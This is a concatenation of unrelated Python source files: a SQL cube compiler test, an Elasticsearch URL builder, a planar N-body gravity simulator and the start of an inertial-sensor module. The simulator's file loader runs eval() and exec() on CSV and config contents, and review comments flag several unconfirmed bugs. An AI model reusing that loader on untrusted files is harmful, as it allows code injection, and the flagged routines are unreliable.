    sql0 = compiler.compile(Query(
        cube='Users',
        measures=['count'],
        dimensions=['city', 'companyName'],
    ))
    print(sql0)
    assert sql0 == dedent('''\
    SELECT
      users.city users_city, users.company_name users_companyName,
      count(users.id) users_count
    FROM (SELECT * FROM users) AS users
    GROUP BY 0, 1
    ''')
    # filtered measure -> CASE WHEN guard inside the count
    sql1 = compiler.compile(Query(
        cube='Users',
        measures=['payingCount'],
        dimensions=['city'],
    ))
    print(sql1)
    assert sql1 == dedent('''\
    SELECT
      users.city users_city,
      count(CASE WHEN (users.paying = true) THEN users.id END) users_payingCount
    FROM (SELECT * FROM users) AS users
    GROUP BY 0
    ''')
    # measure referencing other measures (template expansion)
    sql2 = compiler.compile(Query(
        cube='Users',
        measures=['payingPercentage'],
        dimensions=['city'],
    ))
    print(sql2)
    assert sql2 == dedent('''\
    SELECT
      users.city users_city,
      100.0 * count(CASE WHEN (users.paying = true) THEN users.id END) / count(users.id) users_payingPercentage
    FROM (SELECT * FROM users) AS users
    GROUP BY 0
    ''')
def test_yaml():
    """Smoke-test loading the spec from YAML (users.short.yaml on disk)
    into Cube models and dumping it back as JSON."""
    users_dict = yaml.safe_load(Path('users.short.yaml').read_text())
    # NOTE(review): this local 'users' shadows the imported users module.
    users = {name: Cube(**spec) for name, spec in users_dict.items()}
    print(json.dumps({name: cube.dict() for name, cube in users.items()}, indent=2))
|
"""url builder"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from es_downloader.config import IMAGO_DOC_URL, \
IMAGO_LIVE_VIDEO_URL, \
DOWNLOAD_TYPE_DOC, DOWNLOAD_TYPE_LIVE_IMG, \
DOWNLOAD_TYPE_LIVE_VID, IMAGO_LIVE_PHOTOS_URL, \
IMAGO_DOC_URL_METADATA, IMAGO_LIVE_PHOTOS_URL_METADATA, \
IMAGO_LIVE_VIDEO_URL_METADATA, MEDIA_PROVIDER_DOC_URL, \
MEDIA_PROVIDER_LIVE_PHOTOS_URL, MEDIA_PROVIDER_LIVE_VIDEO_URL
from es_downloader.exception import ElasticSearchDownloader
from es_downloader.utils import find_item_dict
class UrlBuilder(object):
    """Builds download URLs for documents / live photos / live videos.

    The URL template is selected from the download type and whether the
    media-provider endpoints or the imago endpoints (prod or dev,
    optionally the metadata variant) should be used.
    """
    def __init__(self, download_type, index=None, imago_dev=False,
                 media_provider = False, dotted_path=None,
                 key=None, metadata_url=False):
        self.index = index  # ES index name; used for legacy path/key defaults
        self.download_type = download_type
        self.imago_dev = imago_dev  # True -> use the imago-dev host
        self.media_provider = media_provider  # True -> media-provider URLs
        self.dotted_path = dotted_path  # dotted path into each query result
        self.key = key  # key holding the id at the dotted path
        self.metadata_url = metadata_url  # If True, downloads Image metadata
    def build_urls_no_query(self, ids):
        """Build URLs for explicitly given ids.

        :param ids: iterable of ids
        :return: dict mapping each id to its download URL
        """
        url_template = self._get_url_template()
        return {_id: url_template.format(id=_id) for _id in ids}
    def build_urls_with_query(self, query_results):
        """Build URLs for ids extracted from query results.

        :param query_results: iterable of ES query result dicts
        :return: dict mapping each id to its download URL
        """
        url_template = self._get_url_template()
        return {_id: url_template.format(id=_id)
                for _id in self._get_ids(query_results)}
    def _get_url_template(self):
        """Select the URL template for the configured endpoint/type.

        :return: URL template with an ``{id}`` placeholder
        :raises ElasticSearchDownloader: for an unsupported download type
        """
        if self.media_provider:
            if self.download_type == DOWNLOAD_TYPE_DOC:
                source_url = MEDIA_PROVIDER_DOC_URL
            elif self.download_type == DOWNLOAD_TYPE_LIVE_IMG:
                source_url = MEDIA_PROVIDER_LIVE_PHOTOS_URL
            elif self.download_type == DOWNLOAD_TYPE_LIVE_VID:
                source_url = MEDIA_PROVIDER_LIVE_VIDEO_URL
            else:
                # Bug fix: previously this branch fell through and raised
                # UnboundLocalError on 'source_url' instead of a clear error.
                raise ElasticSearchDownloader('Unsupported download type')
        else:
            if self.download_type == DOWNLOAD_TYPE_DOC:
                imago_url = IMAGO_DOC_URL_METADATA if self.metadata_url \
                    else IMAGO_DOC_URL
            elif self.download_type == DOWNLOAD_TYPE_LIVE_IMG:
                imago_url = IMAGO_LIVE_PHOTOS_URL_METADATA if self.metadata_url \
                    else IMAGO_LIVE_PHOTOS_URL
            elif self.download_type == DOWNLOAD_TYPE_LIVE_VID:
                imago_url = IMAGO_LIVE_VIDEO_URL_METADATA if self.metadata_url \
                    else IMAGO_LIVE_VIDEO_URL
            else:
                raise ElasticSearchDownloader('Unsupported download type')
            host = 'imago-dev' if self.imago_dev else 'imago'
            source_url = imago_url.format(imago=host)
        return source_url
    def _apply_legacy_defaults(self):
        """Set legacy dotted_path/key defaults from download type and index.

        IMPORT: kept for backward compatibility; should be deprecated.
        """
        if self.download_type == DOWNLOAD_TYPE_DOC:
            if self.index.startswith('platform'):
                self.dotted_path = 'documents_data'
            else:
                self.dotted_path = None
            self.key = 'document_id'
        elif self.download_type == DOWNLOAD_TYPE_LIVE_IMG and \
                self.index.startswith('platform'):
            self.dotted_path = 'live_photos_data'
            self.key = 'live_photo_id'
        elif self.download_type == DOWNLOAD_TYPE_LIVE_VID and \
                self.index.startswith('platform'):
            self.dotted_path = 'live_videos_data'
            self.key = 'live_video_id'
    def _get_ids(self, query_results):
        """Extract document/photo/video ids from query results.

        :param query_results: iterable of ES query result dicts
        :return: list of ids
        :raises ElasticSearchDownloader: when no key can be determined
        """
        doc_ids = list()
        if self.key is None:
            self._apply_legacy_defaults()
        if self.key is None:
            raise ElasticSearchDownloader('Please provide dotted path and key!')
        for result in query_results:
            res_dict, self.key = find_item_dict(result, self.dotted_path, self.key)
            if isinstance(res_dict, list):
                # NOTE: list entries are appended as-is while single values
                # are coerced via int(float(...)) — preserved behavior.
                doc_ids.extend(item.get(self.key)
                               for item in res_dict if self.key in item)
            elif res_dict.get(self.key):
                doc_ids.append(int(float(res_dict.get(self.key))))
        return doc_ids
|
# <gh_stars>0  (dataset artifact; kept as a comment so the file parses)
# requires numpy, tested on python 2.7
from __future__ import print_function
import cmath
import csv
import math
import random
import numpy as np
'''this module provides the classes to simulate a set of bodies subject to gravity.
All calculations are made in the plane, and positions are encoded as complex numbers
to enable simple numpy calculations.
http://www.artcompsci.org/kali/vol/two_body_problem_2/ch11.html
'''
G = 6.6742E-11  # gravitational constant (m^3 kg^-1 s^-2)
COLL_TIME_MULTIPLIER = 0.01  # default time-step multiplier
VECTORTYPE = np.complex128  # 2-D vectors are stored as complex numbers

def vector(point):
    """Build a 2-D vector (complex number) from *point*.

    Accepts an already-complex value, which is returned unchanged, or an
    (x, y) pair, which is converted to VECTORTYPE.
    """
    if isinstance(point, complex):
        return point
    real, imag = point
    return VECTORTYPE(real + 1j * imag)
def inner(a, b):
    """Complex product a * conj(b).

    The real part is the 2-D dot product a.x*b.x + a.y*b.y; the imaginary
    part is the cross term a.y*b.x - a.x*b.y.  Note the full complex value
    is returned, not just the real part.
    """
    return a * np.conj(b)
def fformat(f):
    """Format a float compactly for display.

    Very large (>10000) or very small (<0.1) magnitudes use 2-significant-
    digit scientific/general form; magnitudes above 100 drop decimals;
    everything else keeps two decimals.
    """
    magnitude = abs(f)
    if magnitude > 10000 or magnitude < 0.1:
        fmt = '%.2g'
    elif magnitude > 100:
        fmt = '%.0f'
    else:
        fmt = '%.2f'
    return fmt % f
def cformat(c):
    """Format a complex 2-D vector as '[x,y]' using fformat for each part."""
    return '[%s,%s]' % (fformat(c.real), fformat(c.imag))
class NBodySystem(object):
    """Base implementation of the N-body problem with leapfrog-style
    (predictor-corrector with jerk) integration in the plane (x, y only).
    Positions and velocities are complex values."""
    def __init__(self, r, v, m, coll_time_multiplier):
        '''r: vector of position of the bodies at t=0, complex in m
        v: velocity, complex in (m/s)
        m: mass (kg)
        coll_time_multiplier: multiplier to the time step, typically 0.01
        All vectors of the same sizes.
        '''
        self.r = r
        self.v = v
        self.m = m
        self.N = len(m)
        # identity mask used to zero the diagonal of pairwise matrices
        self.opt_id = np.identity(self.N)
        # precomputed -G * m_i * m_j matrix for the potential energy
        self.opt_gmm = -G * np.multiply.outer(self.m, self.m)
        self.post_set()
        self.a, self.jk = self.acc_and_jerk(self.r, self.v)
        self.coll_time_multiplier = coll_time_multiplier
    # not tested yet.
    def add_body(self, r, v, m):
        # append a body and rebuild the cached pairwise matrices
        self.r = np.append(self.r, r)
        self.v = np.append(self.v, v)
        self.m = np.append(self.m, m)
        self.N = len(m)  # NOTE(review): len(m) of the *argument*, not self.m — confirm
        self.opt_id = np.identity(self.N)
        self.opt_gmm = -G * np.multiply.outer(self.m, self.m)
        self.post_set()
        self.a, self.jk = self.acc_and_jerk(self.r, self.v)
    # hook to add post calculation. not used anymore
    def post_set(self):
        pass
    def acc_and_jerk(self, r, v):
        '''calculates the acceleration and jerk from positions and
        velocity of the bodies. Jerk is da/dt.'''
        rji = np.add.outer(r, -r)  # matrix of the relative positions
        vji = np.add.outer(v, -v)  # matrix of the relative velocities
        r1 = np.absolute(rji)  # matrix of distances (diagonal is 0 -> div by 0, masked below)
        r2 = r1 * r1
        r3 = r1 * r2
        am = rji / r3 * self.m
        np.putmask(am, self.opt_id, 0.)  # zero the self-interaction diagonal
        a = -G * np.add.reduce(am, 1)
        jkm = -G * self.m / r3 * (vji - 3 * rji * inner(rji, vji) / r2)
        np.putmask(jkm, self.opt_id, 0.)
        jk = np.add.reduce(jkm, 1)
        return a, jk
    def step(self, t, dt):
        '''applies one step: calculates acceleration and jerk, then
        applies them to position and velocity'''
        old_r = self.r
        old_v = self.v
        old_a = self.a
        old_jk = self.jk
        # predictor: Taylor expansion to third order
        dt2 = dt * dt
        r = self.r + self.v * dt + 0.5 * self.a * dt2 + self.jk * dt2 * dt / 6.
        v = self.v + self.a * dt + 0.5 * self.jk * dt2
        # corrector: re-evaluate forces at the predicted state, then blend
        self.a, self.jk = self.acc_and_jerk(r, v)
        self.v = old_v + (old_a + self.a) * (dt * .5) + (old_jk - self.jk) * dt2 / 12
        self.r = old_r + (old_v + self.v) * (dt * .5) + (old_a - self.a) * dt2 / 12
        self.post_set()
    def forward_fixed(self, starttime, endtime, dt=-1, steps=-1):
        '''moves from starttime to endtime.

        Either dt (step size) or steps (step count) drives the loop.
        NOTE(review): with both defaults (-1), truedt goes negative —
        callers are expected to pass a positive dt or steps.
        '''
        dT = float(endtime - starttime)
        dt = min(dt, dT)
        if steps == -1:
            truedt = dT / int(dT / dt)  # snap dt so steps divide dT exactly
            steps = int(dT / truedt + 0.5)
        else:
            truedt = dT / float(steps)
        for i in range(steps):
            self.step(starttime, truedt)
            starttime += truedt
        return steps, starttime
    def collision_time(self):
        '''Returns the min of (ri/vi), which is used to estimate the next dt'''
        # calculates the collision time -> review next dt
        rji = np.add.outer(self.r, -self.r)  # matrix of the relative positions
        vji = np.add.outer(self.v, -self.v)  # matrix of the relative velocities
        v1 = np.absolute(vji)
        sel = np.nonzero(v1)  # ignore pairs with zero relative speed
        return np.min(np.nan_to_num(np.absolute(rji)[sel] / v1[sel]))
    def energy(self):
        '''calculates the total energy (potential and kinetic) of the
        system'''
        rji = np.add.outer(self.r, -self.r)  # matrix of the relative positions
        r = np.absolute(rji)
        epotm = self.opt_gmm / r
        np.putmask(epotm, self.opt_id, 0.)  # drop the infinite diagonal
        epot = -0.5 * np.sum(epotm)  # each pair counted twice, hence 0.5
        ekin = 0.5 * np.add.reduce(self.m * inner(self.v, self.v))
        return (ekin + epot).real
    def barycenter(self):
        # NOTE(review): returns the per-body mass-weighted positions, not
        # their sum — a true barycenter would be np.sum(r*m)/sum(m); confirm
        # how callers use this.
        return self.r * self.m / np.sum(self.m)
    def speed_qty(self):
        # total momentum (sum of m_i * v_i)
        return np.sum(self.m * self.v)
    def set_zero_speed_qty(self):
        self.v -= self.speed_qty() / np.sum(self.m) # initialize total speed qty
class NBodyCommandSystem(NBodySystem):
    '''An N-body system where an acceleration command can be applied to
    each body (e.g. spaceship thrust), with radius-based collision
    detection.'''
    def __init__(self, r, v, m, radius, coll_time_multiplier):
        '''r, v, m, coll_time_multiplier: as NBodySystem;
        radius: vector of body radiuses (m), same length as m.'''
        self.acc_command = np.zeros(len(r), VECTORTYPE)  # per-body commanded acceleration
        self.radius = radius
        NBodySystem.__init__(self, r, v, m, coll_time_multiplier)
        # pairwise radius sums used by check_collide()
        self.sumradius = np.add.outer(self.radius, self.radius)
        np.putmask(self.sumradius, self.opt_id, 0)  # otherwise will collide planets with themselves
    def acc_and_jerk(self, r, v):
        '''gravitational acceleration/jerk plus the commanded acceleration'''
        a, jk = NBodySystem.acc_and_jerk(self, r, v)
        a += self.acc_command
        return a, jk
    def post_step(self, dt):
        '''hook called after each integration step; no-op by default'''
        pass
    def step(self, t, dt):
        NBodySystem.step(self, t, dt)
        self.post_step(dt)
    def check_collide(self):
        '''checks if the distance between 2 bodies is smaller than the
        sum of their radiuses. This does not take into account
        motion, but with the collision_time this should not be a
        problem.

        Returns a list of (i, j, closing_term) tuples with i < j, or [].
        '''
        rji = np.add.outer(self.r, -self.r)  # matrix of the relative positions
        distmatrix = abs(rji) - self.sumradius
        close_bodies = distmatrix < 0
        # Fix: np.sometrue was deprecated and removed in NumPy 2.0; np.any
        # is the documented equivalent. Also dropped an unused 'result' list.
        if np.any(close_bodies):
            vji = np.add.outer(self.v, -self.v)  # matrix of the relative velocities
            # they are close and going towards each other
            towards = -inner(vji, rji)
            collision = np.logical_and(close_bodies, towards > 0)
            if np.any(collision):
                return [(i, j, towards[i, j]) for i, j in zip(*np.nonzero(collision)) if i < j]
        return []
    def closest(self, idx, ignorelist=()):
        '''gets the closest body from body idx (indexes in the list),
        skipping indexes in ignorelist; None if all are ignored'''
        ignore = set(ignorelist)
        order = (np.absolute(self.r - np.ones(self.r.shape) * self.r[idx]) - self.radius).argsort()
        for idx in order[1:]:  # first is the body itself
            if idx not in ignore:
                return idx
        return None
    def attractor(self, idx):
        '''index of the body with the strongest attraction on body idx
        (|m / r^2|; the abs() turns the complex r*r into |r|^2)'''
        r = self.r - self.r[idx]
        a = np.absolute(self.m / (r * r))
        a[idx] = 0  # exclude self (division by zero above yields inf/nan here)
        return a.argmax()
class BoundSystemDescriptor(object):
    """Descriptor exposing one element of a system-level array as a body
    attribute.

    Reads and writes getattr(instance._system, name)[instance._index], so
    a bound body transparently proxies its slot in the system's arrays.
    """
    def __init__(self, name):
        # name of the array attribute on the bound system (e.g. 'r', 'v')
        self.name = name
    def __get__(self, instance, owner=None):
        array = getattr(instance._system, self.name)
        return array[instance._index]
    def __set__(self, instance, value):
        array = getattr(instance._system, self.name)
        array[instance._index] = value
class Body(object):
    '''An element subject to gravitational force; a proxy to the arrays
    stored in a system. Usage: (1) instantiate the bodies, (2) build a
    system from all of them, then (3) bind each body to the system with
    bind().'''

    # Live state, proxied to the bound system's arrays.
    v = BoundSystemDescriptor('v')    # velocity
    a = BoundSystemDescriptor('a')    # acceleration
    r = BoundSystemDescriptor('r')    # position
    m = BoundSystemDescriptor('m')    # mass
    jk = BoundSystemDescriptor('jk')  # jerk (da/dt)

    def __init__(self, position, velocity, mass):
        self.initialposition = vector(position)
        self.initialvelocity = vector(velocity)
        self.mass = mass
        self._system = None  # set by bind()
        self._index = -1     # slot index in the system arrays

    def bind(self, system, index):
        '''binds this body to a system'''
        self._system = system
        self._index = index

    @property
    def idx(self):
        '''index of this body inside its system'''
        return self._index

    def info(self):
        '''short debug representation using the bound system state'''
        return "<body (%.3e,%.3e) (%.3e,%.3e) %.3e>" % (self.r.real, self.r.imag, self.v.real, self.v.imag, self.mass)
class SpaceBody(Body):
    '''a body with a radius and an atmosphere flag, for use in
    NBodyCommandSystem-based systems'''
    def __init__(self, name, position, velocity, mass, radius, parent, atm, **attrs):
        Body.__init__(self, position, velocity, mass)
        self.initialradius = radius
        self.name = name
        self.parent = parent  # parent body (e.g. the star), or None
        self.atm = atm  # True if the body has an atmosphere
        # extra keyword parameters become plain attributes
        for i, j in attrs.items():
            setattr(self, i, j)
    def __str__(self):
        return self.name
    def __repr__(self):
        return "<SpaceBody %s>" % self.name
    @property
    def radius(self):
        # live radius, proxied to the bound system's radius array
        return self._system.radius[self._index]
    @radius.setter
    def radius(self, value):
        self._system.radius[self._index] = value
        # keep the system's pairwise radius-sum matrix in sync
        # NOTE(review): unlike NBodyCommandSystem.__init__, the diagonal is
        # NOT re-zeroed here (no putmask) — after a radius change a body may
        # "collide" with itself in check_collide(); confirm.
        self._system.sumradius = np.add.outer(self._system.radius, self._system.radius)
    @property
    def closest(self):
        # nearest other body, delegated to the system
        return self._system.closest_body(self)
    @property
    def attractor(self):
        # body exerting the strongest attraction on this one
        return self._system.bodylist[self._system.attractor(self.idx)]
    @property
    def distance_to_closest(self):
        return abs(self.r - self.closest.r)
    @property
    def rel_coord(self):
        # Accessor object whose attributes are this body's state relative
        # to its closest body, rotated into the radial direction (u).
        class Coord:
            def __init__(self, body):
                self.body = body
                self.parent = self.body.closest
                r = body.r - body.closest.r
                self.u = (r / abs(r)).conjugate()  # unit vector towards the body, conjugated
            def __getattr__(self, attr):
                return (getattr(self.body, attr) - getattr(self.parent, attr)) * self.u
        return Coord(self)
    # the following calculations are relative to another body, assuming a 2-body system
    def barycenter(self, body):
        return (body.m * body.r + self.m * self.r) / (body.m + self.m)
    def barycenter_vel(self, body):
        return (body.m * body.v + self.m * self.v) / (body.m + self.m)
    def rel_energy(self, body):
        # total orbital energy (potential + kinetic) relative to *body*
        r = self.r - body.r
        v = self.v - body.v
        mm = self.m * body.m
        epot = -G * mm / np.absolute(r)
        ekin = 0.5 * self.m * np.absolute(v) ** 2
        return (epot + ekin)
    def escape_speed(self, body):
        return math.sqrt(2 * G * body.m / np.absolute(body.r - self.r))
    def eccentricity(self, body):
        # orbital eccentricity from the vis-viva/angular-momentum relation
        rel_pos = self.r - self.barycenter(body)
        rel_velocity = self.v - self.barycenter_vel(body)
        red_mass = (self.m + body.m) / (self.m * body.m)
        ang_momentum = (rel_velocity.conjugate() * rel_pos).imag # cross vector
        # clamp at 0 to guard against tiny negative values from rounding
        ecc2 = max(0, 1 + 2 * self.rel_energy(body) * ang_momentum ** 2 * red_mass / ((body.m * G) ** 2))
        return math.sqrt(ecc2)
class SpaceShip(SpaceBody):
    '''a body with an acceleration command (thrust) for use in
    NBodyCommandSystem'''
    # commanded acceleration, proxied to the system's acc_command array
    acc_command = BoundSystemDescriptor('acc_command')
    @property
    def acc_command_polar(self):
        '''get the command in polar coordinates: (magnitude, phi in degrees)'''
        a, phi = cmath.polar(self.acc_command)
        return a, phi / math.pi * 180.
    @acc_command_polar.setter
    def acc_command_polar(self, command):
        (acc, angle) = command
        self.acc_command = cmath.rect(acc, angle / 180. * math.pi)
        # NOTE(review): 'f' is never used; self.rel_coord builds a Coord
        # (which queries the system for the closest body) — looks like
        # leftover debug code; confirm before removing.
        f = self.rel_coord
class BodyListSystem(NBodySystem):
    """NBodySystem built from a list of Body objects, which get bound to
    the system's arrays so each body proxies its own slot."""
    def __init__(self, bodylist, coll_time_multiplier):
        self.bodylist = bodylist
        m = np.array([i.mass for i in bodylist], np.float64)
        r = np.array([i.initialposition for i in bodylist], VECTORTYPE)
        v = np.array([i.initialvelocity for i in bodylist], VECTORTYPE)
        # NOTE(review): 'radius' is computed but never passed on —
        # NBodySystem takes no radius (only NBodyCommandSystem does).
        radius = np.array([i.initialradius for i in bodylist], np.float64)
        for i, b in enumerate(self.bodylist):
            b.bind(self, i)
        NBodySystem.__init__(self, r, v, m, coll_time_multiplier)
    @property
    def parents(self):
        # bodies with no parent (e.g. the central star)
        return [body for body in self.bodylist if body.parent is None]
    def closest_body(self, body, *ignore):
        # NOTE(review): relies on self.closest(), which is defined on
        # NBodyCommandSystem — only works via BodyListCommandSystem.
        idx = self.closest(body.idx, [b.idx for b in ignore])
        return self.bodylist[idx]
    def check_body_collide(self):
        # map index pairs from check_collide() back to Body objects
        return [(self.bodylist[i], self.bodylist[j], t) for i, j, t in self.check_collide() if i < j]
class BodyListCommandSystem(NBodyCommandSystem, BodyListSystem):
    """Command-capable system built from a list of SpaceBody objects;
    combines NBodyCommandSystem (thrust, radiuses, collisions) with
    BodyListSystem's body-list helpers."""
    def __init__(self, bodylist, coll_time_multiplier):
        self.bodylist = bodylist
        m = np.array([i.mass for i in bodylist], np.float64)
        r = np.array([i.initialposition for i in bodylist], VECTORTYPE)
        v = np.array([i.initialvelocity for i in bodylist], VECTORTYPE)
        radius = np.array([i.initialradius for i in bodylist], np.float64)
        for i, b in enumerate(self.bodylist):
            b.bind(self, i)
        NBodyCommandSystem.__init__(self, r, v, m, radius, coll_time_multiplier)
class rnd:
    """Lazy cache of random values, indexable by arbitrary keys.

    rnd()[i] returns a random number that stays stable for a given key i;
    rnd().rnd() draws a fresh value and remembers it in .last.  Used as a
    helper inside formula evaluation contexts.
    """
    def __init__(self):
        self.vals = {}  # key -> cached random value
        self.last = random.random()
    def __getitem__(self, i):
        # Bug fix: the original wrote to/read from self.value, an attribute
        # that was never defined (AttributeError on first access); the
        # cache dict is self.vals.
        if i not in self.vals:
            self.vals[i] = random.random()
        return self.vals[i]
    def rnd(self):
        self.last = random.random()
        return self.last
def get_context():
    '''Build the evaluation namespace for formulas in the configuration
    file: everything from math, cmath and random, plus an 'rnd' cache
    instance.'''
    import math, cmath, random
    context = {}
    for module in (math, cmath, random):
        context.update(module.__dict__)
    context['rnd'] = rnd()
    return context
formula_context = get_context()
class NamedSystemBuilder(object):
    '''object to build a system from a csv file'''

    def __init__(self, *planets):
        # Bodies are kept both as an ordered list and a by-name map.
        self.bodylist = []
        self.bodymap = {}
        self.add(*planets)

    def getsystem(self, coll_time_multiplier):
        # Build the simulation object from the accumulated bodies.
        return BodyListSystem(self.bodylist, coll_time_multiplier)

    def makeplanet(self, name, distance, phaseindeg, direction, radius, mass, parentname, atm=False, cls=SpaceBody,
                   **attrs):
        '''Creates a planet given the parameters. The parameters may be strings or formulas to eval.
        name: name of the body. Doesn't have to be unique
        distance: distance to the parent in m (the star for a planet, a placet for a satellite, etc) or (0,0)
        phaseindeg: phase in degree.
        direction: velocity of the body compared to the velocity required to stay in orbit.
        Enter 1 for a circle orbit, 1j to go towards the parent
        radius: radius in m
        mass: mass in kg
        parentname: name of the parent
        atm: true is there is an atmosphere
        cls: class to implement the body. SpaceBody by default, Spaceship for the spaceship
        attrs: additional parameters directly passed to the constructor of cls.
        '''
        phase = phaseindeg / 180. * math.pi
        # '--' (or a self-reference) marks a root body with no parent.
        if parentname == '--' or parentname == name:
            parent = None
        else:
            parent = self.bodymap[parentname]
        if parent:
            # Distances in the data are measured from the parent's surface.
            distance += parent.initialradius
        # find the velocity according to parameter "direction"
        u = cmath.exp(1j * phase)
        if parent is None:
            velocity = 0j
            position = distance * u
        else:
            position = distance * u + parent.initialposition
            gravityfromparent = G * parent.mass / distance ** 2
            # Circular-orbit speed is sqrt(G*M/d) = sqrt(d * g); "direction"
            # scales/rotates it (1j turns the tangential vector radially).
            velocity = math.sqrt(distance * gravityfromparent) * u * 1j * direction + parent.initialvelocity
        attr = {}
        if atm:
            # NOTE(review): extra attributes are only forwarded (coerced to
            # float) when an atmosphere is present -- confirm this is intended.
            for i, j in attrs.items():
                attr[i] = float(j)
        return cls(name, position, velocity, mass, radius, parent, atm, **attr)

    def makeplanet_eval(self, name, distance, phaseindeg, direction, radius, mass, parentname, atm='False',
                        cls=SpaceBody, **attrs):
        # Evaluate the formula strings from a csv row in the shared context.
        # NOTE(review): eval() on file contents -- only load trusted files.
        global formula_context
        name = name.strip()
        parentname = parentname.strip()
        distance = eval(distance, formula_context)
        phaseindeg = eval(phaseindeg, formula_context)
        direction = eval(direction, formula_context)
        radius = eval(radius, formula_context)
        mass = eval(mass, formula_context)
        atm = atm.strip().lower() == 'true'
        return self.makeplanet(name, distance, phaseindeg, direction, radius, mass, parentname, atm, cls, **attrs)

    def readfile(self, filename):
        '''read csv file'''
        reader = csv.DictReader(open(filename), skipinitialspace=True)
        for j in reader:
            # print (j)
            # Rows whose name starts with '#' are comments.
            if j['name'].startswith("#"):
                continue
            if j['name'].strip() == 'Spaceship':
                j['cls'] = SpaceShip
            planet = self.makeplanet_eval(**j)
            self.add(planet)

    def execfile(self, filename):
        # Execute a python config file; it registers bodies through make().
        context = formula_context.copy()

        def make(*args, **kwargs):
            self.add(self.makeplanet(*args, **kwargs))
        context['make'] = make
        context['SpaceShip'] = SpaceShip
        exec(open(filename).read(), context)

    def add(self, *planets):
        # Register bodies in both the ordered list and the by-name map.
        for planet in planets:
            self.bodylist.append(planet)
            self.bodymap[planet.name] = planet

    def getbodylist(self):
        return self.bodylist
def main(filename):
    # Load a system from *filename* and report the relative energy drift
    # after a fixed-step integration run.
    b = NamedSystemBuilder()
    b.readfile(filename)
    s = b.getsystem(0.1)
    # NOTE(review): 'rows' is unused (leftover reporting spec?); note the
    # 'ditance' typo and that the 'velocity' row subtracts a *position*.
    rows = (('time', 't'),
            ('name', 'i.name'),
            ('x', 'i.r.real/1e6'),
            ('y', 'i.r.imag/1e6'),
            ('ditance', 'abs(i.r-getparentposition(i.parent))'),
            ('velocity', 'abs(i.v-getparentposition(i.parent))')
            )
    t = 0
    TOTAL_T = 100000
    N = 10
    dt = TOTAL_T / N
    en0 = s.energy()  # reference energy before integration
    for i in range(N):
        steps, t = s.forward_fixed(t, t + dt, dt=1000)
    en1 = s.energy()
    # Relative energy error is a proxy for integration accuracy.
    print("Error on energy", (en1 - en0) / en0)
if __name__ == '__main__':
    import sys
    # Usage: script [-p | somefile.csv]; with no argument, run the default
    # 'missionmoon.csv' scenario. '-p' profiles a run of planet.csv.
    if len(sys.argv) > 1:
        if sys.argv[1] == '-p':
            print('profiling')
            import cProfile
            cProfile.run('main("planet.csv")', 'profile')
        elif sys.argv[1][-4:] == '.csv':
            main(sys.argv[1])
    else:
        main('missionmoon.csv')
|
<reponame>drjdlarson/gncpy<filename>gncpy/sensors.py
import abc
import io
import numpy as np
import gncpy.wgs84 as wgs84
from gncpy.orbital_mechanics import ecc_anom_from_mean, true_anom_from_ecc, \
correct_lon_ascend, ecef_from_orbit
from gncpy.coordinate_transforms import ecef_to_NED
"""
-------------------------------------------------------------------------------
------------------------------ Inertial Sensors -------------------------------
-------------------------------------------------------------------------------
"""
class InertialBase:
    """ Defines basic functionality for inertial sensors.
    This implements a basic measurement function and calculates the associated
    bias, scale factor, and misalignment terms needed by an inertial sensor.
    Attributes:
        misalign_sig (list): Sigma values for the misalignment terms, 1 per
            axis, assumes 3 axis
        scale_factor_sig (list): Sigma values for the scale factor terms,
            1 per axis, assumes 3 axis
        corr_times (list): Correlation times for the bias, 1 per axis,
            assumes 3 axis
        gm_vars (list): Variance of the Gauss-Markov processes for each bias,
            1 per axis, assumes 3 axis
        sample_time (float): Sampling time of the Gauss-Markov process
        init_bias_var (list): Variance of the initial bias value
        wn_var (list): Variance of the white noise, 1 per axis, assumes 3 axis
    """

    def __init__(self, **kwargs):
        self.misalign_sig = kwargs.get('misalign_sig', [0, 0, 0])
        self.scale_factor_sig = kwargs.get('scale_factor_sig', [0, 0, 0])
        self.corr_times = kwargs.get('corr_times', [1, 1, 1])
        self.gm_vars = kwargs.get('gm_vars', [0, 0, 0])
        self.sample_time = kwargs.get('sample_time', 1)
        self.init_bias_var = kwargs.get('init_bias_var', [0, 0, 0])
        self.wn_var = kwargs.get('wn_var', [0, 0, 0])
        # Lazily initialized state; empty arrays mean "not yet computed".
        self._sf = np.array([[]])
        self._last_bias = np.array([[]])
        self._gm_drive_sig = 0

    def measure(self, true):
        """Returns measurements based on the true values.
        Applies scale factor/misalignments, adds bias, and adds noise to true
        values.
        Args:
            true (N x 1 numpy array): array of true sensor values, N <= 3
        Returns:
            (N x 1 numpy array): array of measured values, N <= 3
        """
        noise = np.sqrt(np.array(self.wn_var)) * np.random.randn(3)
        sf = self.calculate_scale_factor()
        return sf @ true + self.calculate_bias() + noise.reshape((3, 1))

    def calculate_bias(self):
        """ Calculates the bias for each axis.
        This assumes a Gauss-Markov model for the bias terms, see
        :cite:`Quinchia2013_AComparisonbetweenDifferentErrorModelingofMEMSAppliedtoGPSINSIntegratedSystems`
        Returns:
            (3 x 1 numpy array): bias for each axis
        """
        if self._last_bias.size == 0:
            # sqrt converts init_bias_var (a variance) to a sigma, consistent
            # with how wn_var is used in measure().
            init = np.sqrt(np.array(self.init_bias_var)) * np.random.randn(3)
            # Bug fix: reshape() returns a new array; the original discarded
            # the result, leaving _last_bias as shape (3,) so the update below
            # broadcast the bias to a (3, 3) matrix.
            self._last_bias = init.reshape((3, 1))
        beta = 1 / np.array(self.corr_times)
        var = np.array(self.gm_vars)
        # Driving-noise sigma for the discrete first-order Gauss-Markov model.
        self._gm_drive_sig = np.sqrt(var * (1 - np.exp(-2
                                                       * self.sample_time
                                                       * beta)))
        self._gm_drive_sig = self._gm_drive_sig.reshape((3, 1))
        beta = beta.reshape((3, 1))
        w = self._gm_drive_sig * np.random.randn(3, 1)
        # First-order discretization of the Gauss-Markov process.
        bias = (1 - self.sample_time * beta) * self._last_bias + w
        self._last_bias = bias
        return bias

    def calculate_scale_factor(self):
        """ Calculates the scale factors and misalignment matrix.
        The matrix is drawn once and cached for the sensor's lifetime.
        Returns:
            (3 x 3 numpy array): identity plus scale-factor diagonal plus
            off-diagonal misalignment terms
        """
        if self._sf.size == 0:
            # Bug fix: randn(1, 3) is 2-D, so np.diag() *extracted* a
            # 1-element diagonal instead of building a diagonal matrix
            # (which then broadcast over the whole 3x3). Draw a 1-D vector
            # so np.diag() constructs the diagonal scale-factor matrix.
            sf = np.array(self.scale_factor_sig) * np.random.randn(3)
            ma = np.zeros((3, 3))
            for row in range(0, 3):
                for col in range(0, 3):
                    if row == col:
                        continue
